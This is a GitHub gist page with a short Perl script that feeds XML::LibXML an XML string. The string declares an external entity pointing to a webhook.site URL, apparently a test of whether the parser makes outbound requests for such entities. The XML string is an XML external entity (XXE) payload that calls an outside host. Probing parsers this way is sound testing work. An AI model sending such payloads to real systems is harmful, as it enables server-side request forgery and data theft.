Skip to content

Instantly share code, notes, and snippets.

@j1n3l0
Created December 30, 2024 12:04
Show Gist options
  • Save j1n3l0/f7fc6e37fa32ce0d87571608749e0c38 to your computer and use it in GitHub Desktop.
Save j1n3l0/f7fc6e37fa32ce0d87571608749e0c38 to your computer and use it in GitHub Desktop.
use 5.020;
use XML::LibXML ();
XML::LibXML->load_xml( string => <<'EOF' );
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://webhook.site/<unique-token>">]>
<foo>&xxe;</foo>
EOF
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment